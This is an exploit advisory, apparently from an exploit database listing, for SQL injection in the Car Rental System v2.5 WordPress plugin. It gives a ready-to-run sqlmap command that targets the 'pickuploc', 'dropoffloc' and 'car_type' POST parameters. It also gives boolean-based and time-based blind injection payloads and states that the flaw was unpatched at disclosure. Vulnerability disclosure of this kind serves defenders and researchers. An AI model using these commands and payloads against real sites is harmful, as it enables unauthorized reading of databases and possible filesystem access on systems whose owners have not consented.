50 lines
No EOL
1.7 KiB
Text
50 lines
No EOL
1.7 KiB
Text
# Exploit Title: Car Rental System v2.5
|
|
# Date: 28/03/2017
|
|
# Exploit Author: TAD GROUP
|
|
# Vendor Homepage: https://www.bestsoftinc.com/
|
|
# Software Link: https://www.bestsoftinc.com/car-rental-system.html
|
|
# Version: 2.5
|
|
# Contact: info[at]tad.group
|
|
# Website: https://tad.group
|
|
# Category: Web Application Exploits
|
|
|
|
1. Description
|
|
|
|
An unescaped parameter was found in Car Rental System v2.5 (WP plugin). An attacker can exploit this vulnerability to read from the database.
|
|
The POST parameters 'pickuploc', 'dropoffloc', and 'car_type' are vulnerable.
|
|
|
|
2. Proof of concept
|
|
|
|
sqlmap -u "http://server/wp-car/" —data="pickuploc=2&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=" --dbs --threads=5 --random-agent
|
|
|
|
Parameter: pickuploc (POST)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: pickuploc=2 AND 3834=3834&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind
|
|
Payload: pickuploc=2 AND SLEEP(5)&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
|
|
|
|
The same is applicable for 'dropoffloc' and 'car_type' parameters
|
|
|
|
|
|
3. Attack outcome:
|
|
|
|
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
|
|
|
|
4. Impact
|
|
|
|
Critical
|
|
|
|
5. Affected versions
|
|
|
|
<= 2.5
|
|
|
|
6. Disclosure timeline
|
|
|
|
13-Mar-2017 - found the vulnerability
|
|
13-Mar-2017 - informed the developer
|
|
28-Mar-2017 - release date of this security advisory
|
|
|
|
Not fixed at the date of submitting this exploit. |